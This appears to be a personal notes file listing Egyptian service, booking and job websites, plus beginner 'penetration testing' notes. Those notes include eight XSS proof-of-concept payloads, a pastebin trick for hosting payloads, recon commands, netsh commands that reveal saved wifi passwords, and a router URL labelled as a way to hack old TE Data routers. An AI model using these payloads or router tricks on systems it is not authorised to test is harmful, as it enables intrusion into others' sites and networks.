

					important websites
					****************
============================================================================================
============================================================================================
websites for services
*****************

google.com/android/find		> find my phone

egypt.gov.eg			> egypt services online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
websites for booking
*****************

enr.gov.eg

ar.trivago.com

eg.wego.com

superjet.com.eg

go-bus.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
websites for learn
***************

elearning.moe.gov.eg

marj3.com

edraak.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
websites for free work
*******************

eg.mostaql.com

freelancer.com

upwork.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
websites for jobs
**************

forasna.com

jobzella.com

wzayef.com

linkedin.com

bayt.com

shaghalni.com

wzfne.com
============================================================================================
============================================================================================
					penetration testind
					*******************
============================================================================================
============================================================================================
xss payloads
***************

1\ x<svg/onload=confirm(/testing/)>
2\ <script>alert("asd")</script>
3\ <script>confirm("asd")</script>
4\ >x<script>confirm("asd")</script>
5\ <img src=x onerror=alert("asd")>
6\ >x<img src=x onerror=alert("asd")>
7\ ' onerror='alert(111)'
8\ javascript:onclick=alert(11);
============================================================================================
website to encode html tags
********************************

https://www.url-encode-decode.com/
============================================================================================
website to macke html payload or
html file or txt file in internet
*********************************

https://pastebin.com/

1\ write html payload
2\ create new paste
3\ raw
============================================================================================
secure website from xss
**************************

use function htmlspecialchars()
ex: $asd = htmlspecialchars($_GET['name']);
============================================================================================
tools gother informatio
**************************

1\ view all device in my network
>>> netdiscover
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2\ get ip by domain
>>> whois yahoo.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3\ get domain by id
>>> whois 120.198.155.177
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
4\ get information
>>> nslookup google.com
============================================================================================
websites to practice
************************

1\ http://testphp.vulnweb.com/
2\ https://www.hacksplaining.com/
3\ https://xss-game.appspot.com/
============================================================================================
websites to gather information
***********************************

1\ netcraft.com
2\ pipl.com
3\ shodan.io
============================================================================================
websites to search for get hacked emails
***********************************************

1\ haveibeenpwned.com
2\ hacked-email.com
============================================================================================
website to get all dns used
*******************************

1\ virus-total.com
============================================================================================
hacking wifi
**************

http://192.168.1.1/wizard_wlan_t.gch
============================================================================================
download cources
*********************

https://youtubemultidownloader.com/playlist.html
============================================================================================
select location any ip
************************

http://www.advanced-ip-scanner.com/
============================================================================================
websites to download images as hieght quality
*****************************************************

1\ pixabay.com
2\ unsplash.com
3\ thepatternlibrary.com
4\ picjumbo.com
5\ gratisography.com
6\ nos.twnsnd.co
7\ isorepublic.com
8\ getrefe.tumblr.com
9\ picography.co
10\ hdwallpapers.net 
11\ freehdw.com 
12\ bestwallpaper-hd.com 
13\ 1hdwallpapers.com 
14\ hdwallpapers.in 
15\ splashbase.co 
16\ canweimage.com 
17\ wallpaperswide.com 
============================================================================================
============================================================================================
					linux problem
					*************
============================================================================================
============================================================================================
unable to open windows partation from linux
***************************************************

>>> ntfsfix /dev/sda3
============================================================================================
wifi card not work after use airmon-ng
*******************************************

1\ service network-manager restart
2\ airmon-ng stop wlan0
3\ airmon-ng stop wlan0mon
============================================================================================
install any app in linux
**************************

1\ sudo add-apt-repository ppa:webupd8team/brackets
2\ sudo apt-get update
3\ sudo apt-get install brackets
============================================================================================
============================================================================================
					hacking
					*******
============================================================================================
============================================================================================
show current wifi password by windows
**********************************************

1\ run cmd as adminstrator
2\ cd\
3\ netsh
4\ wlan show profile
5\ wlan show profile "wifi name" key=clear
============================================================================================
hacking TE data old router
********************************

http://192.168.1.1/wizard_wlan_t.gch
============================================================================================
============================================================================================
============================================================================================




















